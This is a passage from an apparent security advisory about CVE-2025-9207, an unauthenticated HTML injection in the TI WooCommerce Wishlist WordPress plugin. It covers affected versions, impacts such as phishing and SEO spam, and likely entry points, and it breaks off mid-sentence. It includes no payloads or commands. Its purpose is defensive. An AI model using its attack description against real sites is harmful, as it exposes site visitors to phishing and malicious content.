| Plugin Name | TI WooCommerce Wishlist |
|---|---|
| Type of Vulnerability | Content injection |
| CVE Number | CVE-2025-9207 |
| Urgency | Low |
| CVE Publish Date | 2025-12-13 |
| Source URL | CVE-2025-9207 |
Urgent Security Advisory: Unauthenticated HTML Injection in TI WooCommerce Wishlist (≤2.10.0) — What WordPress Site Owners Must Do Now
Author: Hong Kong Security Expert · Date: 2025-12-13
Summary: An unauthenticated HTML/content injection (CVE-2025-9207) affects TI WooCommerce Wishlist versions ≤ 2.10.0. The vulnerability allows an unauthenticated actor to inject arbitrary HTML into pages and posts. The vendor has released a patched version (2.11.0). Sites running vulnerable versions should update immediately and follow the detection & remediation steps below.
Overview
On 13 December 2025 a disclosure recorded an unauthenticated HTML/content injection in the TI WooCommerce Wishlist plugin affecting versions up to and including 2.10.0. The plugin author released version 2.11.0 to address the issue.
From the perspective of a Hong Kong security practitioner: this vulnerability class is serious because it lets an unauthenticated actor inject HTML into content served from your legitimate domain. Although the reported CVSS score is moderate, the practical impacts — phishing content, SEO spam, client‑side attacks — can quickly damage trust and commercial operations.
This advisory explains the risk, step‑by‑step mitigation, detection tips, and controls you should apply immediately.
What is an unauthenticated HTML (content) injection?
Content injection means an attacker can insert HTML (and sometimes JavaScript) into pages or posts that the site serves to visitors. “Unauthenticated” means the attacker does not need to log in — exploitation is possible from the public internet.
Potential consequences include:
- Phishing pages that harvest credentials or payment data.
- SEO/Spam injection that creates hidden pages, affiliate links, or malicious redirects.
- Drive‑by downloads or client‑side attacks via injected scripts or iframes.
- Search engine penalties, blacklisting, and long‑term reputational damage.
Because malicious content is served from the site’s legitimate domain, users are more likely to trust it — which increases the impact considerably.
Vulnerability summary: TI WooCommerce Wishlist (≤2.10.0)
- Software: TI WooCommerce Wishlist (WordPress plugin)
- Affected versions: ≤ 2.10.0
- Fixed in: 2.11.0
- Type: Unauthenticated HTML / Content Injection
- Attack vector: HTTP (unauthenticated)
- CVE: CVE-2025-9207
- Disclosure date: 13 Dec 2025
In short: an unauthenticated actor can submit crafted requests that result in HTML being stored or displayed within site content or pages, enabling content manipulation without valid credentials.
Technical analysis — how an attacker can abuse this vulnerability
The following is a high‑level technical description to help defenders understand typical mechanics behind content injection issues:
- Input accepted without proper sanitization/escaping
The plugin exposes an endpoint or form parameter that accepts user supplied text. Server‑side code fails to sanitize or escape HTML, or incorrectly uses functions that allow tags through.
- Stored vs. reflected
This is a stored/content injection scenario — malicious content persists and is shown to any user visiting an affected page. Stored injections are more serious because they persist across caching and are indexed by search engines.
- Entry points
Wishlist features typically accept item titles, notes, descriptions, or custom text fields — common entry points. Attackers may target wishlist creation or publicly accessible AJAX endpoints.
- Escalation vectors
Injected content can include HTML that loads external resources, iframes, forms, or minimal JavaScript (depending on output context). Even without
